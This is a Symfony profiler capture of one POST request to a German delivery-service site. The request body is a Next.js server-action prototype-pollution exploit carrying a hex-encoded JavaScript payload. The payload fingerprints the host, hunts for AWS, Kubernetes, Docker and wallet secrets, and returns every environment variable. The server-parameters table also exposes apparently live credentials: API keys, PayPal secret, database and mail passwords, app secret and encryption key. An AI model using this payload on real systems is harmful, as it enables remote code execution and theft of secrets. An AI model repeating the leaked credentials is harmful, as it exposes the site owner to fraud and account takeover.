Request / Response
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var reject_bridge = arguments[1]; (Promise.all([Function('return import(\"node:child_process\")')(), Function('return import(\"node:zlib\")')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { try { var user_code = global[String.fromCharCode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327293b636f6e73742066733d617761697420696d706f72742827667327293b636f6e737420706174683d617761697420696d706f727428277061746827293b636f6e737420726561643d2870293d3e7b7472797b72657475726e2066732e7265616446696c6553796e6328702c277574663827293b7d63617463682865297b72657475726e27273b7d7d3b636f6e7374206578697374733d2870293d3e7b7472797b66732e61636365737353796e632870293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e7374207772697461626c653d2870293d3e7b7472797b66732e61636365737353796e6328702c66732e636f6e7374616e74732e575f4f4b293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e737420637075733d6f732e6370757328293b636f6e7374206d656d3d6f732e746f74616c6d656d28293b636f6e737420706c6174666f726d3d6f732e706c6174666f726d28293b6c657420757365723d27756e6b6e6f776e273b7472797b757365723d6f732e75736572496e666f28292e757365726e616d653b7d63617463682865297b757365723d70726f636573732e656e762e555345527c7c70726f636573732e656e762e555345524e414d457c7c27756e6b6e6f776e273b7d0a6c657420656e765f747970653d274d4554414c273b69662870726f636573732e656e762e4b554245524e455445535f534552564943455f484f53547c7c70726f636573732e656e762e444f434b45525f484f53547c7c70726f636573732e656e762e4157535f455845435554494f4e5f454e567c7c70726f636573732e656e762e44594e4f7c7c65786973747328272f2e646f636b6572656e7627297c7c65786973747328272f72756e2f2e636f6e7461696e6572656e762729297b656e765f747970653d27434f4e5441494e4552273b7d0a696628706c6174666f726d3d3d3d276c696e757827297b636f6e7374206367726f75703d7265616428272f70726f632f73656c662f6367726f757027293b6966286367726f75702e6d61746368282f646f636b65727c6b756265706f64737c6c78637c706f646d616e2f6929297b656e765f747970653d27434f4e5441494e4552273b7d0a636f6e7374206d6f756e74733d7265616428272f70726f632f73656c662f6d6f756e74696e666f27293b6966286d6f756e74732e6d61746368282f6f7665726c61797c6f7665726c6179322f69292626656e765f747970653d3d3d274d4554414c27297b656e765f747970653d27434f4e5441494e4552202850726f6261626c6529273b7d7d0a636f6e7374206e6574733d6f732e6e6574776f726b496e746572666163657328293b636f6e7374206970733d5b5d3b4f626a6563742e6b657973286e657473292e666f7245616368286b3d3e7b6e6574735b6b5d2e666f7245616368286e3d3e7b696628216e2e696e7465726e616c26266e2e66616d696c793d3d3d274950763427296970732e70757368286e2e61646472657373293b7d293b7d293b636f6e73742077726974655f636865636b733d5b6f732e746d7064697228292c272f6465762f73686d272c272f7661722f746d70272c70726f636573732e63776428295d3b636f6e737420756e697175655f636865636b733d5b2e2e2e6e6577205365742877726974655f636865636b73295d3b636f6e7374207772697461626c655f70617468733d756e697175655f636865636b732e66696c74657228703d3e7772697461626c65287029293b6c6574206861735f617678323d2730273b696628637075735b305d2626637075735b305d2e6d6f64656c2e746f55707065724361736528292e696e636c756465732827415658322729297b6861735f617678323d2731273b7d0a656c736520696628706c6174666f726d3d3d3d276c696e757827297b636f6e737420637075496e666f3d7265616428272f70726f632f637075696e666f27293b696628637075496e666f2e696e636c756465732827617678322729296861735f617678323d2731273b7d0a636f6e7374206876745f6b6579776f7264733d2f4157535f7c4543535f7c4543325f7c505249564154455f4b45597c4d4e454d4f4e49437c57414c4c45547c4b455953544f52457c534545445f5048524153457c53454e44475249447c4d41494c47554e7c504f53544d41524b7c5345535f2f693b636f6e73742069735f6876745f656e763d4f626a6563742e6b6579732870726f636573732e656e76292e736f6d65286b3d3e6876745f6b6579776f7264732e74657374286b29293b636f6e737420686f6d653d6f732e686f6d6564697228293b636f6e7374206177735f63726564733d706174682e6a6f696e28686f6d652c272e617773272c2763726564656e7469616c7327293b6c65742069735f6876745f6469736b3d657869737473286177735f6372656473293b696628706c6174666f726d3d3d3d276c696e757827297b69735f6876745f6469736b3d69735f6876745f6469736b7c7c7772697461626c6528272f7661722f72756e2f646f636b65722e736f636b27297c7c65786973747328272f7661722f72756e2f736563726574732f6b756265726e657465732e696f2f736572766963656163636f756e742f746f6b656e27297c7c65786973747328272f726f6f742f2e6177732f63726564656e7469616c7327293b7d0a6c65742061637475616c5f72616d5f6d623d4d6174682e666c6f6f72286d656d2f313032342f31303234292e746f537472696e6728293b6c65742061637475616c5f636f7265733d637075732e6c656e6774682e746f537472696e6728293b696628706c6174666f726d3d3d3d276c696e757827297b7472797b6c6574206d656d5374723d7265616428272f7379732f66732f6367726f75702f6d656d6f72792f6d656d6f72792e6c696d69745f696e5f627974657327292e7472696d28293b696628216d656d537472296d656d5374723d7265616428272f7379732f66732f6367726f75702f6d656d6f72792e6d617827292e7472696d28293b6966286d656d53747226266d656d537472213d3d276d617827297b636f6e73742062797465733d7061727365496e74286d656d537472293b6966282169734e614e28627974657329262662797465733e30262662797465733c6d656d297b61637475616c5f72616d5f6d623d4d6174682e666c6f6f722862797465732f313032342f31303234292e746f537472696e6728293b7d7d0a636f6e73742071756f74613d7061727365496e74287265616428272f7379732f66732f6367726f75702f6370752f6370752e6366735f71756f74615f757327292e7472696d2829293b636f6e737420706572696f643d7061727365496e74287265616428272f7379732f66732f6367726f75702f6370752f6370752e6366735f706572696f645f757327292e7472696d2829293b6966282169734e614e2871756f74612926262169734e614e28706572696f6429262671756f74613e30297b61637475616c5f636f7265733d4d6174682e666c6f6f722871756f74612f706572696f64292e746f537472696e6728293b69662861637475616c5f636f7265733d3d3d2230222961637475616c5f636f7265733d22302e58223b656c73652061637475616c5f636f7265733d4d6174682e6d617828312c7061727365496e742861637475616c5f636f72657329292e746f537472696e6728293b7d656c73657b636f6e7374206370754d61783d7265616428272f7379732f66732f6367726f75702f6370752e6d617827292e7472696d28293b6966286370754d6178297b636f6e73742070617274733d6370754d61782e73706c697428272027293b69662870617274732e6c656e6774683d3d3d32262670617274735b305d213d3d276d617827297b636f6e737420713d7061727365496e742870617274735b305d293b636f6e737420703d7061727365496e742870617274735b315d293b6966282169734e614e28712926262169734e614e287029297b6c657420633d4d6174682e666c6f6f7228712f70293b61637475616c5f636f7265733d28633c313f22302e58223a63292e746f537472696e6728293b7d7d7d7d7d63617463682865297b7d7d0a72657475726e7b22706c6174666f726d223a706c6174666f726d2c22757365725f6964223a757365722c226b65726e656c5f72656c65617365223a6f732e72656c6561736528292c22656e765f74797065223a656e765f747970652c22686f73745f636f7265735f746f74616c223a637075732e6c656e6774682e746f537472696e6728292c22757361626c655f636f726573223a61637475616c5f636f7265732c226370755f6d6f64656c223a637075735b305d3f637075735b305d2e6d6f64656c3a22756e6b6e6f776e222c226861735f61767832223a6861735f617678322c2272616d5f746f74616c5f6d62223a4d6174682e666c6f6f72286d656d2f313032342f31303234292e746f537472696e6728292c22757361626c655f72616d5f6d62223a61637475616c5f72616d5f6d622c22697073223a6970732c227772697461626c655f7061746873223a7772697461626c655f70617468732c22637764223a70726f636573732e63776428292c22656e765f76617273223a70726f636573732e656e762c22656e765f766172735f636f756e74223a4f626a6563742e6b6579732870726f636573732e656e76292e6c656e6774682e746f537472696e6728292c2269735f687674223a2869735f6876745f656e767c7c69735f6876745f6469736b292e746f537472696e6728297d3b7d2928293b', 'hex').toString(); var val = eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Error('JS_EXEC_ERR'), { digest: global[String.fromCharCode(66,117,102,102,101,114)].from('JS Async Error: ' + e.message).toString('hex') })); }); } catch(e) { reject(Object.assign(new Error('JS_ERR'), { digest: global[String.fromCharCode(66,117,102,102,101,114)].from('JS Error: ' + e.message).toString('hex') })); } });})).catch(err => reject_bridge(err)); ", "_formData": {"get": "$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _stopwatch_token | "8c28d9" |
Request Headers
| Header | Value |
|---|---|
| accept | "text/plain, */*;q=0.1" |
| accept-encoding | "identity" |
| connection | "close" |
| content-length | "8828" |
| content-type | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| host | "www.delivertastic.com" |
| next-action | "x" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" |
| x-accel-internal | "/internal-nginx-static-location" |
| x-php-ob-level | "1" |
| x-real-ip | "165.227.141.188" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "private, must-revalidate" |
| content-security-policy | "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.tailwindcss.com https://cdnjs.cloudflare.com https://fonts.googleapis.com https://unpkg.com https://cdn.jsdelivr.net https://www.googletagmanager.com https://www.google-analytics.com https://googleads.g.doubleclick.net; style-src 'self' 'unsafe-inline' https://cdn.tailwindcss.com https://cdnjs.cloudflare.com https://fonts.googleapis.com https://unpkg.com https://cdn.jsdelivr.net; font-src 'self' https://cdnjs.cloudflare.com https://fonts.gstatic.com; img-src 'self' data: https: https://www.google.com https://www.google.de https://www.googletagmanager.com https://googleads.g.doubleclick.net; connect-src 'self' https://api.stripe.com https://api.paypal.com https://nominatim.openstreetmap.org https://unpkg.com https://cdnjs.cloudflare.com https://*.tile.openstreetmap.org https://www.google-analytics.com https://analytics.google.com https://www.googletagmanager.com https://www.google.com https://www.google.de https://www.googleadservices.com; frame-ancestors 'self'" |
| content-type | "text/html; charset=UTF-8" |
| date | "Tue, 30 Dec 2025 05:42:03 GMT" |
| expires | "-1" |
| permissions-policy | "geolocation=*, microphone=(), camera=()" |
| pragma | "no-cache" |
| referrer-policy | "strict-origin-when-cross-origin" |
| strict-transport-security | "max-age=31536000; includeSubDomains" |
| x-content-type-options | "nosniff" |
| x-debug-token | "dfd80a" |
| x-frame-options | "SAMEORIGIN" |
| x-xss-protection | "1; mode=block" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| ADMIN_ALLOWED_IPS | "88.72.142.78,88.72.143.72,127.0.0.1,::1,78.47.124.1,92.208.184.248" |
| ANTHROPIC_API_KEY | "sk-ant-api03-fallback-key-for-development" |
| APP_ENV | "dev" |
| APP_SECRET | "3f83b0f9e3d8f5b31a5c2941657bc33c" |
| APP_STORE_LINK | "https://apps.apple.com/de/app/delivertastic" |
| APP_URL | "https://delivertastic.com" |
| DATABASE_URL | "mysql://delivertastic:5384502c8e5002bb34cf2b43c7be76cb08e98c554873670ebdf18073eca6c32d@127.0.0.1:3306/delivertastic?serverVersion=mariadb-10.4.32&charset=utf8mb4" |
| DEBUG_DUMP_SERVER | "127.0.0.1:9912" |
| DEBUG_TOOLBAR | "true" |
| DELIVERTASTIC_COMPANY_ADDRESS | "Milter Str. 24, 48231 Warendorf " |
| DELIVERTASTIC_COMPANY_NAME | "IT Service Schwarz" |
| DELIVERTASTIC_FROM_EMAIL | "noreply@delivertastic.com" |
| DELIVERTASTIC_FROM_NAME | "DELIVERTASTIC Team" |
| DELIVERTASTIC_MAX_FILE_SIZE | "5M" |
| DELIVERTASTIC_PER_ORDER_PRICE | "0.75" |
| DELIVERTASTIC_SETUP_PRICE | "49.00" |
| DELIVERTASTIC_SUPPORT_EMAIL | "info@delivertastic.de" |
| DELIVERTASTIC_SUPPORT_PHONE | "+49 (0) 123 456 789" |
| DELIVERTASTIC_UPLOAD_PATH | "%kernel.project_dir%/public/uploads" |
| ENCRYPTION_KEY | "LGRPw3Rg74HcOprYraff8nLQiIowvUIjUBENrdxExA8=" |
| GOOGLE_CLOUD_API_KEY | "AIzaSyAjnCBtWv4T5fj6-h4aw2qZhF24oDOGw3g" |
| GOOGLE_PLAY_LINK | "https://play.google.com/store/apps/details?id=com.delivertastic.manager" |
| MAILER_DSN | "smtp://noreply%40delivertastic.com:uD99d%2A1z5@delivertastic.com:465?encryption=ssl&auth_mode=login" |
| MERCURE_JWT_SECRET | "!ChangeThisMercureHubJWTSecretKey!" |
| MERCURE_PUBLIC_URL | "https://localhost/.well-known/mercure" |
| MERCURE_URL | "https://localhost/.well-known/mercure" |
| MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
| OPENAI_API_KEY | "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" |
| OPENAI_MODEL | "gpt-4o" |
| OPENAI_VISION_MODEL | "gpt-4o" |
| PAYPAL_CLIENT_ID | "ARQv9Q0GLxbtloJe4ALmI0f7Fxr9GsBuzXyr-iVV5dAtFEzAisGSA2Yq0ywAOGM47P-aAWIHPwtkorsr" |
| PAYPAL_MODE | "sandbox" |
| PAYPAL_SECRET | "EIQu29BsAlskuMy3-4qFEOzojnMAyLaIPlii6ACnRheZvNL2q4Dd8H8GTcD0mnvAIZ3mcQ0GppUsytEU" |
| PRINTER_LOGO_PATH | "%kernel.project_dir%/public/uploads/logo.png" |
| PRINTER_PATH | "192.168.1.100:9100" |
| PRINTER_TYPE | "network" |
| SEVEN_API_KEY | "2iisKqLw007MQ1C9rM3buvXxi4PXQEEHZ0QbLdyB8GjyRmMYitSdFAOy5k8Npi1B" |
| SEVEN_FROM | "DTastic" |
| STRIPE_PUBLISHABLE_KEY | "your_stripe_publishable_key_here" |
| STRIPE_SECRET_KEY | "your_stripe_secret_key_here" |
| STRIPE_WEBHOOK_SECRET | "your_stripe_webhook_secret_here" |
| WINDOWS_APP_LINK | "https://delivertastic.com/downloads/manager-windows.exe" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "8828" |
| CONTENT_TYPE | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/vhosts/delivertastic.com/httpdocs/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/vhosts/delivertastic.com/httpdocs/public" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www/vhosts/delivertastic.com" |
| HTTPS | "on" |
| HTTP_ACCEPT | "text/plain, */*;q=0.1" |
| HTTP_ACCEPT_ENCODING | "identity" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "www.delivertastic.com" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" |
| HTTP_X_ACCEL_INTERNAL | "/internal-nginx-static-location" |
| HTTP_X_REAL_IP | "165.227.141.188" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "165.227.141.188" |
| REMOTE_PORT | "37410" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1767073323 |
| REQUEST_TIME_FLOAT | 1767073323.2555 |
| REQUEST_URI | "/" |
| SCRIPT_FILENAME | "/var/www/vhosts/delivertastic.com/httpdocs/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SCRIPT_URI | "https://www.delivertastic.com/" |
| SCRIPT_URL | "/" |
| SERVER_ADDR | "91.99.134.180" |
| SERVER_ADMIN | "[no address given]" |
| SERVER_NAME | "www.delivertastic.com" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.0" |
| SERVER_SIGNATURE | "<address>Apache Server at www.delivertastic.com Port 443</address>\n" |
| SERVER_SOFTWARE | "Apache" |
| SSL_TLS_SNI | "www.delivertastic.com" |
| SYMFONY_DOTENV_PATH | "/var/www/vhosts/delivertastic.com/httpdocs/.env" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,MERCURE_URL,MERCURE_PUBLIC_URL,MERCURE_JWT_SECRET,PAYPAL_CLIENT_ID,PAYPAL_SECRET,PAYPAL_MODE,STRIPE_SECRET_KEY,STRIPE_PUBLISHABLE_KEY,STRIPE_WEBHOOK_SECRET,APP_URL,PRINTER_TYPE,PRINTER_PATH,PRINTER_LOGO_PATH,SEVEN_API_KEY,SEVEN_FROM,APP_STORE_LINK,GOOGLE_PLAY_LINK,WINDOWS_APP_LINK,ANTHROPIC_API_KEY,ADMIN_ALLOWED_IPS,DELIVERTASTIC_SETUP_PRICE,DELIVERTASTIC_PER_ORDER_PRICE,DELIVERTASTIC_SUPPORT_EMAIL,DELIVERTASTIC_SUPPORT_PHONE,DELIVERTASTIC_COMPANY_NAME,DELIVERTASTIC_COMPANY_ADDRESS,DEBUG_TOOLBAR,DEBUG_DUMP_SERVER,DELIVERTASTIC_FROM_EMAIL,DELIVERTASTIC_FROM_NAME,DELIVERTASTIC_UPLOAD_PATH,DELIVERTASTIC_MAX_FILE_SIZE,OPENAI_MODEL,OPENAI_VISION_MODEL,GOOGLE_CLOUD_API_KEY,OPENAI_API_KEY,ENCRYPTION_KEY" |
| UNIQUE_ID | "aVNmK7gM12Y4BRFnmQ8pUgAAAEM" |
| USER | "delivertastic.com_4xdwhbbg03o" |
| proxy-nokeepalive | "1" |